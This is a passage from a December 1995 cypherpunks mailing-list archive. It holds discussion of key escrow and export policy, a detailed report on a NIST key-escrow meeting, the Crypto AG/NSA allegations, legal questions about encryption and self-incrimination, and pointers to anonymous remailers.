SIGNATURE----- -- JHupp at gensys.com |For PGP Public Key: http://gensys.com |finger jhupp at gensys.com A generation which ignores history has no past - and no future. From aq068 at detroit.freenet.org Sun Dec 10 07:37:35 1995 From: aq068 at detroit.freenet.org (Troy M. Walsh) Date: Sun, 10 Dec 95 07:37:35 PST Subject: anti-copy Message-ID: <199512101537.KAA04258@detroit.freenet.org> How would it be possible to create files that KNOW they are a copy? I don't mean ones that look at the mod date, but a system that is near fool-proof. Just something I've pondered... Daark From DMiskell at envirolink.org Sun Dec 10 07:51:40 1995 From: DMiskell at envirolink.org (Daniel Miskell) Date: Sun, 10 Dec 95 07:51:40 PST Subject: The Elevator Problem Message-ID: <9512101551.AA02550@envirolink.org> s1113645 at tesla.cc.uottawa.ca writes: > > >On Sun, 10 Dec 1995, Daniel Miskell wrote: > >> There is an easy way to develop a secret key in front any number of eves, >>be they experts or not, without the eves knowing what the key is. Even if >>they tap your phone/comm line, ect. There was an article in Discovery >>Magazine a couple of years ago, talking about how to use photons and their >>randomness as the perfect, uncrackable code. Use of the photons aside, >>there was a key generation method discussed, simple, yet secure enough to >>work out on a tapped phone. Let me root around. > >You must mean quantum crypto, by G. Brassard and C. Crepeau of U de Montreal. >Requires a direct fiber optic line from pt. A to B, in order to be >secure, if I am not mistaken. Which makes it impractical for most people, >as there are usually switches (or whatever they're called) and more than one >line in between. Lets you use OTPs with your next-door neighbor though. I think i was misunderstood. I was not referring to the actual use of light in the communications process. I was talking about the key generation method suggested in that article. Of course the use of light is impractical for most - the need for direct fiberoptics aside, you have to be able to test a photon for its polarized orientation. In any case, i dig on. Regards, Munster. --- _________________________________ *!Cheese Doctrine:!* Though cultured over time, and aged to perfection, one must not yield to produce mold. One must also not belittle themselves by conforming to the "whiz", but melt over the unprocessed ideas of Ghuda. _________________________________ From master at internexus.net Sun Dec 10 08:45:37 1995 From: master at internexus.net (Laszlo Vecsey) Date: Sun, 10 Dec 95 08:45:37 PST Subject: Is it possible? Message-ID: Suppose I have the source of a C program that I would like to distribute on the Internet. This program computes some data (perhaps attempting to to do a partial brute force) and sends it's results to a server. The problem is someone might modify the source to simply contact the server saying "ok, my part of the brute force failed" and not even do anything. How can I be sure that the source has not been modified from the original distribution before it is compiled? My original plan was to compute many digits of PI using the new Plouffe formula (allows you to compute any Hex digit of PI in linear time) but perhaps trying to brute force things in this way isn't such a bad idea. From atlgator at mindspring.com Sun Dec 10 09:34:03 1995 From: atlgator at mindspring.com (Glenn Johnson) Date: Sun, 10 Dec 95 09:34:03 PST Subject: Is there a lawyer in the house? :) Message-ID: <199512101733.MAA04061@borg.mindspring.com> On the lighter side (not to be taken seriously): Q: What if Alice and Bob are siamese twins? Could we imagine a constitutional test that turns on whether a majority of organs are shared? Could the dissent cite the fact that some of the shared organs are not vital? Q2: Better yet, what if Alice and Bob were only 2 of say 6 distinct personality manifestations exhibited by one physical person? Again, would we need to arrange for a consensus among at least 2 more personalities to form a majority, thus entitling the collective to shared privacy? The answers to these and other exciting questions on the next episode of "Exhaust that Thread." At 01:27 AM 12/10/95 -0500, you wrote: >On Fri, 8 Dec 1995, Black Unicorn wrote: > >> On Thu, 7 Dec 1995, Jeff Weinstein wrote: >> >> > Black Unicorn wrote: >> > > >> > > On Thu, 7 Dec 1995, sameer wrote: >> > > >> > How about if Bob had a contractual agreement with Alice to keep his >> > key secret? >> >> Then as a defense attorney, I would argue that Bob had an obvious >> expectation of privacy with Alice, and that the fact that he relayed this >> key to Alice only under those circumstances represents a definite >> expression of his intent to keep the key private, thus triggering 4th >> amendment protections. My view is that this would be a very strong argument. > >Bob's Fourth Amendment rights are not triggered by his contract with >Alice. Alice can be compelled to give up the key (by testimony or >production) and giving up that key does not tend to incriminate *Alice* >in a violation of law. Alice can't invoke Bob's rights against >self-incrimination for obvious reasons: Alice isn't Bob. >^^^^ >EBD > > >> >> Note that this is an academic opinion, not a legal one as I am not being >> paid. >> >> > >> > --Jeff >> > >> > -- >> > Jeff Weinstein - Electronic Munitions Specialist >> > Netscape Communication Corporation >> > jsw at netscape.com - http://home.netscape.com/people/jsw >> > Any opinions expressed above are mine. >> >> --- >> My prefered and soon to be permanent e-mail address: unicorn at schloss.li >> "In fact, had Bancroft not existed, potestas scientiae in usu est >> Franklin might have had to invent him." in nihilum nil posse reverti >> 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information >> >> > >Not a lawyer on the Net, although I play one in real life. >********************************************************** >Flame away! I get treated worse in person every day!! > > From clarkm at cnct.com Sun Dec 10 09:40:18 1995 From: clarkm at cnct.com (clarkm at cnct.com) Date: Sun, 10 Dec 95 09:40:18 PST Subject: A challenge ... Message-ID: <9512100546.AA0065@localhost> > According to rumor, Jordan Hayes said: > > > > I've been challenged to try to find a bank account; I win the challenge > > if I can wire in $100 to the hidden account. Anyone have any good > > ideas about how to find an ABA number? > > Depends on what information you have. You looking for a Bank Name/ABA # > lookup, or the other way around? Wiring it successfully is one thing. Escaping the exception report at FinCEN and the Fed is quite another. Just an inspired guess... .---. .----------- * :::::::::::::::::::::::::::: / \ __ / ------ * clark.matthews at paranet.org / / \(..)/ ----- * :::::::::::::::::::::::::::: ////// ' \/ ` ---- * //// / // : : --- * PERMISSION TO \\/ / * / /` '--* COPY / REPOST \*/ * //..\\ x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x '//||\\` N E M O..M E..I M P U N E..L A C E S S I T x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x From pcw at access.digex.net Sun Dec 10 09:44:15 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sun, 10 Dec 95 09:44:15 PST Subject: NSA rigs Crypto machines according to Balto Sun Message-ID: Most of us might believe that the holes in Netscape's encryption software were simply the result of sloppy engineering. That was the public story. A story from today's Baltimore Sun (Sunday December 10, 1995) gives more reasons to be paranoid. The Baltimore Sun has been running a long series of articles on the National Security Agency. Some of the earlier ones have been largely positive and filled with stories of intelligence coups. Today's story, describes several reasons why one might believe that the NSA was party to a plan to rig the machines of the Swiss company, Crypto AG, so that the messages could be read by those who knew the game. Crypto AG sells its machines to other countries around the world who believe that the Swiss are neutral vendors of superior technology that wouldn't have such holes. The clearest link, in my mind, was the minutes from a design meeting at Crypto AG which was attended by an NSA cryptographer, Nora Mackebee. (She is now 55, retired and living at what the Sun calls a "Howard County horse farm.") But there are reasons to wonder about this link. Motorola was also part of the list. Also one employee got in a legal battle after being fired. The details were settled a few days before company engineers were scheduled to testify "that they believed the machines were altered." More anecdotal evidence was offered by someone who is listed as a "longtime colleague" of Dr. Kjell Ove Widman, the Swedish mathematician who "had total authority over Crypto algorithms." The colleague said that Widman would often travel to Germany and then return with design instructions. The impression was given that Crypto could only use an algorithm if it was approved. But approval is not, in my mind, proof of a secret attempt to read messages. I believe that the NSA probably did more to strengthen DES than weaken it during the classified design process at IBM. But I only have the work of Biham and Shamir to base these conclusions upon. Perhaps the machines were altered to make them stronger for western firms using them? The Mackabee meeting occured in 1975 during the height of the Cold War. The Soviets were grabbing Western technology left and right. Of course, the Sun also reports that Crypto AG "denied that intelligence agenies had ever rigged its machines." (The words in quote are the Sun's not Crypto AG's. ) So, is this what happened at Crypto AG? Is this what happened at Netscape? We may never no for certain, but there is a final warning for the folks at Netscape that is buried the Sun's article about Crypto AG: "Meanwhile, though the company has hastened to reassure its customers, business has declined and employees have been laid off." -=-=-=-=- There are two more articles in the series. Tuesday's will report that "Trolling for foreign secrets, NSA routinely picks up Americans' overseas calls. And it's legal." On Friday, the article reports, "The next war will be fought with computers. NSA is getting ready." You will be able to buy a reprint of the NSA stories from SunSource. $3.95. Call 410-332-6962. From adam at homeport.org Sun Dec 10 10:05:22 1995 From: adam at homeport.org (Adam Shostack) Date: Sun, 10 Dec 95 10:05:22 PST Subject: More FUD from First Virtual In-Reply-To: <199512101114.FAA26720@khijol> Message-ID: <199512101808.NAA06132@homeport.org> Ed Carp wrote: | Adam Shostack | > jim bell wrote: | > | > [Good points about cost of transactions deleted] | > | > | The answer, I think, it that there would be no problem finding people to | > | take that risk in exchange for the return, ESPECIALLY if they have some | > | input into the design (level of security) of the system. They might insist | > | on 2048-bit RSA keys, instead of 1024-bit, for example. | > | > (I know its only an example, but...) | > | > Key length is not what is needed for better security; more | > solid code and better interfaces are needed. (I might also argue for | > hardware keys that are more difficult to steal..) | | Nonsense. The code is pretty solid, the interfaces aren't very | difficult. What is needed is better human management of keys. Why | brute-force, why look for weak keys, why bother calculating how much | safer 2047-bit keys are rather than 1024-bit keys when someone can | look on your HD and find your secret key, when they can open your | desk drawer and find your pass phrase or password, when they can | guess that you used your wife's maiden name as your password? | | Adam, I don't understand why you wrote nonsense in the first | paragraph, then followed it up with textbook attacks such as: I use PGP becuase its pretty good, but if I was going to trust all my money to it, I'd want better code (especially in key management. And the Mac port needs a few man months of work. ;) I don't know how solid the code is in the ecash client. I do know that Netscape & Microsoft can't seem to ship decent code. (This is a reflection of the way the industry has evolved; the first system to require a bigger processor due to creeping featuritis gets the most market share. Quality of code seems to be unimportant.) No flame at Netscape here; they're doing what the market, conditioned by MS to never expect bug free code, seems to want. Further, the interfaces are not decent. Ever tried teaching your mother to use PGP? I have a lot of smart freinds; a lot of them, while understanding how easy it is to read mail in transit, haven't found a PGP front end thats easy enough to use that they will use it. (This is not an invitation to send me your favorite GUI to PGP (although if anyone has a web page of all/most of them, with reviews & comments and maybe even screen shots, I'd like the URL.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From s1113645 at tesla.cc.uottawa.ca Sun Dec 10 10:07:53 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sun, 10 Dec 95 10:07:53 PST Subject: The Elevator Problem In-Reply-To: <9512101551.AA02550@envirolink.org> Message-ID: On Sun, 10 Dec 1995, Daniel Miskell wrote: > I think i was misunderstood. I was not referring to the actual use of light > in the communications process. I was talking about the key generation method > suggested in that article. Of course the use of light is impractical for most > - the need for direct fiberoptics aside, you have to be able to test a photon > for its polarized orientation. In any case, i dig on. I didn't read the Discover article, but I did see it in Applied Crypto, 1st edition. The polarization thing was used for eavesdropper detection, rather than key generation (I think, and I may be quite wrong). The paper was intended to show that you could have unconditional security even if P=NP (I even think that was one of the paper titles), so the authors used a one time pad (and used whatever key generation method is usually used for OTPs, ie coin flips, real RNGs and whatnot). So nothing special or new with regards to key generation. (Of course they may have newer papers...Any hints folks?) Incidentally, Brassard wrote a nice and very short intro to modern crypto that's in the Springer-Verlag Lecture Notes in Computer Science series. I think Applied Cryptology was the title. It had good coverage of his quantum crypto scheme. It ought to be in any university library. From ecarp at netcom.com Sun Dec 10 10:57:49 1995 From: ecarp at netcom.com (Ed Carp) Date: Sun, 10 Dec 95 10:57:49 PST Subject: GAK and self-incrimination? Message-ID: <199512101959.NAA14976@khijol> > Date: Sun, 10 Dec 1995 02:57:36 -0800 > To: cypherpunks at toad.com > From: Greg Broiles > Subject: Re: GAK and self-incrimination? > Cc: tcmay at got.net > > Tim May writes: > > >Consider this hypo: I send an encrypted message to a partner in crime > >containing plans for future crimes and descriptions of past crimes. I don't > >GAK the message. The government prosecutes me under the Anti-Terrorism and > >Child Protection Act of 1997. > > > >My defense? That GAKKing the message would be tantamount to incriminating > >myself, which the Fifth Amendment protects me against. > > The Fifth protects you against *compelled* self-incrimination - in > particular, the right to be free from the "cruel trilemma" of > > o conviction of a substantive crime, based on your > (true) testimony > o conviction of perjury, for lying when asked to incriminate > yourself > o contempt of court sanctions, for refusing to answer > > but your hypo doesn't seem to create that forbidden situation. In > particular, you're free to simply not send the message at all. I don't believe that that would be a consideration. Wasn't there a court case a few years ago, in which a convicted criminal sued the government, charging that filling out one of those forms that you have to fill out when you buy a gun was a violation of his 5th amendment rights? What ever happened to that case? I also think that, besides the obvious 5th amendment problems, there would be a 1st amendment problem - if you "*had* to use GAK to communicate, that would be an impermissible restriction on your 1st amendment rights. From rsalz at osf.org Sun Dec 10 11:00:50 1995 From: rsalz at osf.org (Rich Salz) Date: Sun, 10 Dec 95 11:00:50 PST Subject: Is it possible? Message-ID: <9512101857.AA07825@sulphur.osf.org> > How can I be >sure that the source has not been modified from the original distribution >before it is compiled? Impossible. From pfarrell at netcom.com Sun Dec 10 11:07:21 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Sun, 10 Dec 95 11:07:21 PST Subject: NIST GAK meeting writeup, LONG part 3 of 3 Message-ID: <199512101904.LAA20587@netcom3.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- NIST Key Export meeting, December 5, 1995 Long version Part 3 of 3. This covers the notes on agent criteria, and the industry presentations. Part 2 of three hasn't been written, it is supposed to address the issues related to interoperability. I decided it was better to get this part out than to wait. Items on the criteria themselves that I think were under reported in my first reports: Ed Appel: the LEA�s are very interested in Criteria #5 (two ended decryption) as they have more than 100 international offices. Miles Smid described a trick for meeting Criteria #5, if you encrypt the session key with your own public key, in addition to the key of your destination, and if you have escrowed your private key with an Escrow Agent, then nearly any approach meets criteria #5. ********* On agent criteria: ********* Geoff G. says that the discussions on agent criteria are simply a follow-on to the main criteria #3. The criteria themselves have been spam'd to the list. They are also available at url: There was a lot of reactions to the SECRET clearance requirement, which they claimed was to handle secure investigations (e.g. FISA). This has already been discussed on the list, so I'll skip it here. David Lesher asked a series of questions concerning the requirement that the Key Escrow Entity employ a person with a SECRET clearance. They included: what agency will issue the clearance? Who will authorize for the BI (background investigation)? Who will pay for it? Who does the existing RBOC clearances? Geoff dodged nearly all of them. He acknowledged that "they" will have to pay, but made no effort to define who "they" are. Geoff said that they may want legislation support for protecting against illegal release of keys, failure to release, etc. A fair number of the agent criteria would be considered professional business practice (no single point of failure, dual locations, etc.) if you thought that escrowing keys was a good thing. ********* User/Industry presentations Bill Sweet of TIS Bill gave a presentation about his CKE product, and how hard he is working to "find a global solution." This is actually the same product that Bill talked about in September when he worked for National Semiconductor. It was impressive then (private keys are NOT escrowed, only session keys, etc.) and is still not approved for export. Bill talked about "information owners," they ultimately decide which security systems get deployed "in spite of various government requirements around the world." He said that "if rational key escrow systems are not offered, or do not adequately protect their information, owners will use unescrowed encryption from whatever sources available (Germany, et al)." Bill talked about a UK University (Royal Holloway) study on UK/European needs for key escrow. He said that there was a lot of overlap with the NIST criteria, but that there were criteria that were judged as totally unacceptable. The first and loudest finding was: "the use of the scheme should provide visible benefits to the user." This begs the obvious question, what visible benefits to the user does GAK bring? Two other interesting findings in the study were: - - An entity with a warrant should not be able to fabricate false evidence." - - Abuse by either side should be detectable by the other. He suggested that these criteria be added to the NIST list of 10. Bill went on to look at the NIST criteria. He said, concerning Criteria #3 (agents certified by US Government or reciprocal agreement), that "this is a show stopper!" because: - -- no reciprocal agreements exist today, anywhere. - -- what about countries where justice systems are different, and what about where "these agreements are not desirable (e.g. Nigeria, Mexico, Saudi Arabia, Argentina, Poland, etc.)? - -- even for NATO countries, agreements will be different (Germany has data privacy laws, in Greece), or we may not want to be reciprocal (in Greece, the government likes to bug the opposition) He also says that Criteria #7, 64-bit keys, is unacceptable. CE Infosys currently sells a PCMCIA (PC Card) encryptor that does triple-DES at T1 speeds. TIS uses it, and sells it in the US. [as an aside, I was told that they can import and resell them, but when one breaks, TIS can�t ship it back to Germany for repairs. Sigh.] Sweet had two recommendations: - -- develop a tiered crypto policy, with hardware and software under differing levels of rules, - -- allow a pilot project, where TIS can sell VPN (virtual private networks) using strong encryption. A VPN is the use of the Internet as a private network for a corporation by adding appropriate firewalls, encryption, etc. It seems to me that while TIS' CKE doesn't meet the criteria, it could be made to, with a few changes. They've have to change the design to allow GAK for any one target. (Criteria #5) This would mean for generating one DRF (ie., LEEF) for each recipient as well as for the sender (as opposed to just for the sender) The neat thing about CKE is that each LEEF holds only the session key -- so you never give away your private key. (I think the govenment really expects that we'll be willing to escrow our private keys. Fat chance!) But this is a bit of a catch 22, because to follow all the criteria, you can't stop there. - -- For each encryption, you generate a DRF for the sender and each recipient - -- For each DRF generated, you must have and check a certificate chain for the chosen DRC and refuse to encrypt unless all recipients and the sender have validly certified (ie., USGovt approved) DRC public keys. - -- Each receiving application must refuse to decrypt unless every other recipient and the sender have validly certified DRC public keys. This gets into the interoperability issues that I need to write up... - -- I don't know how they can meet the revised #6. It seems to be designed specifically to break CKE. To get govie approval, each DRC needs to meet all the key escrow agent entity criteria. I'm really not at all convinced that it is actually practical. This is sad, because CKE is obviously designed with the spirit of the government at heart, with just some modifications to make it marketable. Guess TIS needs an Ireland office too. Ken Mendelson of TIS Ken gave a solid presentation describing how all of the Government�s need for data about key escrow agents could be met with a commercial "vendor registration" approach instead of a Government mandated "certification" scheme. This would be in keeping with the current "spend less money, have less government bureaucratic rules" political climate. I have copies of his slides, I�d rather not type them in. With any luck, he�ll put them up on the TIS web site url: http://www.tis.com Dorothy Denning of Georgetown University Dorothy Denning gave a presentation on an article that will be published in the March 96 Communications of the ACM. It analyzes currently available products (and vapor products) and sees how well they meet Criteria #5. It says that eight of the sixteen approaches that she surveyed currently meet Criteria #5. She lists her web page as http://www.cosc.georgetown.edu/~denning, but as of Sunday 12/10, the text is not available. Melanie Janin, US Council for International Business Ms. Janin�s speech presented the US Council for International Business� comments on GAK. They are a NY based trade group, representing 300 clients. They don�t like GAK. She called for a coherent policy on all encryption. Major topics in the presentation include: - - free choice - - open to the public - - international acceptance - - flexibility of implementation - - User key management - - Key escrow (where they "embrace key escrow as one possible method of managing encryption keys.") - - Liability Ed Scheidt, Tecsec Presented both comments on the criteria and his company�s VEIL and Export VEIL Version 2.0 products. He raised a number of points, including: - - how do we protect our commercial information unless we have the best cryptography? - - we need "constructive key management technology" to manage keys, key splits, and different algorithms for extended data separation. - - solution must address issues such as international trust in a key escrow. He said that his "Export VEIL 2.0" product meets "the intent of 11/95 export criteria today." Daniel Weitzner of CDT Mr. Weitzner agreed to shorten his presentation so that he could yield some time to VTW. He opened by pointing out that while the schedule had both him and Jerry Berman were supposed to talk, Jerry was too busy to make the meeting. "Jerry is out defending pornographers, so I�ll be here defending terrorists." I expect that his text will be on CDT�s webpage, url: http://www.cdt.org. I�ll just enter the key points. The first thing he said is that "this is the wrong forum" and that "the [NIST] process will not work." He proposed a open, privately sponsored forum to develop alternatives that will work. "The NIST proposal will not provide adequate security, privacy, promote secure communications worldwide, or guarantee user privacy." Major issues are: - - Inadequate security - - No viable policy framework for the long-term - - Hinders the deployment of globally interoperable secure systems - - not necessarily voluntary - - not viable in the marketplace - - no constitutional privacy protections - - will not meet the needs of law enforcement, since it will "not deny criminals or terrorists access to strong encryption, the stated objective of the policy." Shaber Safdar, Voters Telecommunication Watch Described the results of an Internet-based, non- scientific survey that the VTW recently made. Not surprisingly, those who replied were overwhelmingly against the NIST proposal. I don�t have the slides, but VTW has a website with most of their information. The url is http://www.vtw.org There were 26 respondents to the survey. 24 out of 26 said that they would never buy products with law enforcement access. 16 out of 24 are already using security products. He described a Technology Pledge that VTW is presenting to politicians (available at url: http://www.vtw.org/pledge/) and stated that Rep. Ronald Wyden (D-OR) signed the pledge with pro- freedom, pro-market answers. David Sobol, EPIC As expected, EPIC doesn�t like much about the NIST proposal. Their comments are on their web page, url: http://www.epic.org/crypto/EPIC_Statement.html A key statement is "Given the reality that users are unlikely to adopt key escrow systems on a voluntary basis, we believe that the current policy will result in the eventual prohibition of non-escrowed products. Indeed, documents released to EPIC under the Freedom of Information Act (FOIA) reveal that NSA and FBI concluded nearly three years ago that �Technological solutions such as they are, will only work if they are incorporated into all encryption products.�" Major points - --Public comment is frequently solicited but never heeded. - --Relevant information has not been released. - --The proposal conceals the attempt to expand wiretapping capability As a result, EPIC proposes the following Policy Recommendations - --Relax export controls on encryption and permit the free flow of encryption products across national borders - --Withdraw FIPS 185 (the Clipper standard for voice, fax,... and low speed data networks in the federal government) - --Remove "cryptology" from items that may be classified ... under executive order - --Do not fund the Telephone Carrier Compliance Program (the "Digital Telephony" proposal) - --Do not permit the use of classified algorithms for public networks - --Examine the activities of the National Security Agency ... since passage of the Computer Security Act of 1987. NOTE: during Mr. Sobel�s discussion, a FBI representative sitting at the head table said that the issues addressed by key escrow are "not just wiretapping, they include search and seizure of all stored media." I was not able to identify the person. He was sitting at Ed Appel�s seat, but did not have a namecard. No one sitting near me recognized him either. Padgett Petersen, Lockheed Martin Noted Internet personality, Padgett Petersen took a rarely held position, he spoke as a Security officer of Lockheed Martin, rather than speaking as a private net-citizen. He said that "these criteria are acceptable and can be made to work." He also said that "without US agreements, there is no reason to be concerned with export." Lockheed Martin was looking forward to participating in using and buying the escrowed products that will hit the market as a result of this process. Robert Hollyman, Business Software Alliance Mr. Hollyman said that "the facts are clear, companies are unanimous against" the NIST proposal. His members agree that: - - security is critical - - 40 bit is not viable - - the 1992 government review requires a change in policy. He recommended: - -- immediate approval of DES or equal strength alternative for export. - -- encourage companies to build encryption software by submitting code to NIST (under non-disclosure) for review - -- add two bits ever three years to allowable key lengths in recognition of Moore�s law. He called this a COCA allowance (cost of cracking algorithms). - -- removal of restrictions on interoperability because they are artificial and antithetical to the Global Information Infrastructure. He stated that the current criteria are vague, and will take years for approval. Yet he notes that in industry, the average life cycle of software is 18 months. Alex McIntosh, PC Security PC Security sells key management systems. Shell is a customer. He addresses a couple of areas that his commercial customers ask. The first question is "why encrypt?" He said that the answer is to protect confidential data. These data include email, PC files, and archival data. This leads to the obvious question, why use key management? The two separate answers are to have operational backup and to allow compliance with internal and external law enforcement. He said that he has a surprise for the NIST folks concerning key escrow agents. The corporate customer is the key escrow agent. Other key observations: - -- Companies, such as Shell, often do business in countries where they can not trust the government. - -- Shell handles over a million email messages a day. This defines engineering requirements for any system to meet. - -- Liability is a huge issue, and the amounts are huge. Geologic information, market strategies, etc. are worth staggering amounts of money. The "US Government can NOT cover Shell�s liabilities." Doug Miller, Software Publishers Association Mr. Miller said that his members need immediate relief from the current encryption export policies. "our members are poised, but cannot leap, because of the barriers that U.S. cryptographic policy continues to impose." He wants to be able to export 56-bit DES. His position paper says, "we believe the discussion should also include assessment of the exportability of products employing the DES algorithm. DES-strength (56-bit) products can compete with 179 foreign products (80 of which are software products) that employ DES. Liberalization of the export restrictions of software with encryption capabilities is essential if U.S. companies are to compete with strong, widely available non-escrowed products." Viktor Hampel, Hampel Consulting Proposed "a �Consumer Protection Act for Digital Products� to support electronic commerce and to control the increasing abuse and lack of security on the national information highways." A copy can be obtained from Hampel Consulting, 1515 Jefferson Davis Highway, Crystal Square Suite 913, Arlington VA 22202- 3312. In his remarks, Mr. Hampel said that trust is important between business. Business worries about issues as varied as what accountability is in the system and how much is the per minute interest on a billion dollar money transfer? These cause business to need solutions that NIST hasn�t raised. He recommended that a public key infrastructure be included into the Uniform Commercial Code. Closing comments. Mike Nelson noted that the meeting had some time for floor questions. He was asked what is the timeframe for finishing the process. He danced, saying that promising a fixed date for policy decisions is bad for your career, but thought it would be done in a couple of months. Someone asked about the "Personal Use" export process (the one that will allow you to export PGP on a laptop computer for personal use, and that was promised for "in a couple of weeks" at the September NIST meeting). They said that it is about to go to the Federal Register, and should be available within weeks. Nelson was asked about foreign escrow agents. He said that "if there exists bilateral diplomatic agreements, then the US will allow specification of Foreign Escrow agents." [Of course, no such agreements exist now.] Ed Appel of the White House said that the intent is to make export "as easy as 40-bit" is under the existing policies. The existing export policies will continue. He also said "so far, we are only controlling export" and that "the government has very strong cryptography available to them, so they are not worried about export." He said they hope to control export in two ways, first by applying the combined purchasing power of the US Government to encourage the market, and by controlling export. ********* After the meeting closed, I invited both Mike Nelson and Ed Appel to the next DC Cypherpunks meeting. Somehow I expect it when they declined. ******** A note on quoting within this document: I did not take a tape recorder to the meeting. Words in quotes were taken from either my hardcopy of handouts, words in documents on cited webpages, or from my noted. I tried hard to keep the words accurate and in context. There may be some cases where my quotes are incorrect. If I've misquoted anyone, it is not delibrate, and if told, I'll post corrections. Pat Copyright (c) 1995, Pat Farrell. Permission granted to electronically redistribute, provided it is transmitted in the whole and unaltered. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBMMsugLCsmOInW9opAQGWSAP/QC3Xja8kE56XGximmiiIVEv3ihJI1uY5 2eWZSVUGOxATc3jbwtLS5bqmkDnSXhQaaD6Slk/zA9IGlNhzi4tMV1xsrKwj4l4d 0KefEWOTinVze+6SQFsIVizGb9WzRaTrGwCV9RY7RRbC0dYa+cb21JXvlZOxYk/Q wGfkSY5/H0Y= =hJvT -----END PGP SIGNATURE----- Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell Infor. Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer From lull at acm.org Sun Dec 10 11:25:43 1995 From: lull at acm.org (John Lull) Date: Sun, 10 Dec 95 11:25:43 PST Subject: Escrow expectations In-Reply-To: Message-ID: <30cae91c.1391349@smtp.ix.netcom.com> Russell Nelson wrote: > > Duncan Frissell writes: > > > If Clipper were mandated you might be able to resist a prosecution for > > > "failure to file" keys or for double encrypting your transmissions if you > > > could prove that you were transmitting illegal messages or evidence of a > > > crime. Just as those who possess illegal weapons are not required to > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > > register them (self incrimination). You have to be sure your traffic is > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > You are mistaken here. Failure to get a permit before turning a > semi-auto firearm into a fully-auto machine gun, for example, is illegal > as is possessing an unregistered machine gun ... My understanding was that, for example, a convicted felon in posession of a handgun where handguns must be registered could be charged with being a convicted felon in posession of a firearm. He could NOT be charged with posession of an unregistered handgun, because requiring him to register, when it is illegal for him to posess, is a violation of his first amendment rights. From hayden at krypton.mankato.msus.edu Sun Dec 10 11:30:31 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Sun, 10 Dec 95 11:30:31 PST Subject: Free calls to Govt (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- This is being forwarded from the ALA Intellectual Freedom mailing list. Thought it might be important here :-) - ---------- Forwarded message ---------- Date: Sun, 10 Dec 1995 09:59:48 -0500 From: Charles Willett To: Multiple recipients of list ALAOIF Subject: Free calls to Govt (fwd) - ---------- Forwarded message ---------- Date: Sat, 9 Dec 1995 14:31:58 -0700 From: El Tiburon To: internet_censorship at monad.net Subject: Free calls to Govt 1) Dail 1-800-444-1555 2) They will give you a short recorded message. 3) Follow instructions if you have a touch tone phone, public ones work best and they have other advantages. :> 4) Enter a zip code...they ask for yours but it doesn't have to be...it can be any in the US. 5) Make a choice of the elected politician's office you want to be connected to. 6) When the staff person answers you are set to discuss the proposed environmental reform regulations, OR ANY OTHER ISSUE YOU WANT! Couple of tricks...we found they limit the number of calls to 3 from each number. Solution: public phones are everywhere...enjoy Exxon's corporate attempt to influence "grassroots democracy". M ______________________________________________________ Activism - Isnt it just participation? Internet Users Consortium 7031 E. Camelback Ste 102-515 Scottsdale, AZ 85251 IUC URL: http://www.indirect.com/www/molsen/ Proteios URL: http://www.indirect.com/www/proteios/ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMMsZczokqlyVGmCFAQE+8AP7BkUKpHH06aC79T8P/J+YRF1AeMC/MB0W 2mEqED/zNhNF7pp2v0mUlRLpG6jrY0NRGip3JWZhRcdTwiMaVEWYNNHE6dUeklzO zm27/NxqKpi/e5ie+CsNwXKeket87+af8OZ8bzvIYg28pNcHAjnq5PLG62Oqsrxz 8E3QAHjAwc4= =l1BI -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+** ------END GEEK CODE BLOCK------ From s1113645 at tesla.cc.uottawa.ca Sun Dec 10 11:36:12 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sun, 10 Dec 95 11:36:12 PST Subject: Qcrypto page, Brassard's book, Re: The Elevator Problem In-Reply-To: Message-ID: On Sun, 10 Dec 1995 I mistakenly wrote: > Incidentally, Brassard wrote a nice and very short intro to modern crypto > that's in the Springer-Verlag Lecture Notes in Computer Science series. > I think Applied Cryptology was the title. It had good coverage of his quantum > crypto scheme. It ought to be in any university library. Sorry, it's Modern Cryptology: A tutorial, 1988. You'll find good info in (the titles are in french, but don't worry, the text in the "cryptographie quantique" section is in english and has plenty of links to papers. Also weird stuff like quantum teleportation. You'll also see Brassard and Crepeau's home pages.) If you run into the listing for the Discover article, please pass it on, I keep putting that one off. From nobody at alpha.c2.org Sun Dec 10 12:07:54 1995 From: nobody at alpha.c2.org (Anonymous) Date: Sun, 10 Dec 95 12:07:54 PST Subject: anonymous remailer In-Reply-To: Message-ID: <199512102002.MAA16196@infinity.c2.org> Fred Nix wrote: > Hey... > > How do I gain acess to the remailer? > > Thanks! > > Fred Nix Since you are using Micro$oft Network, you must pay the extra 10% fee to Bill Gates or he won't give you access to use the remailer. Just kidding. But seriously, if online time is so expensive that you don't feel you can do a simple lycos.com search for "remailer", then you really need to find a cheaper Internet service provider. That said, point your web browser at the following: http://www.stack.urc.tue.nl/~galactus/remailers/ 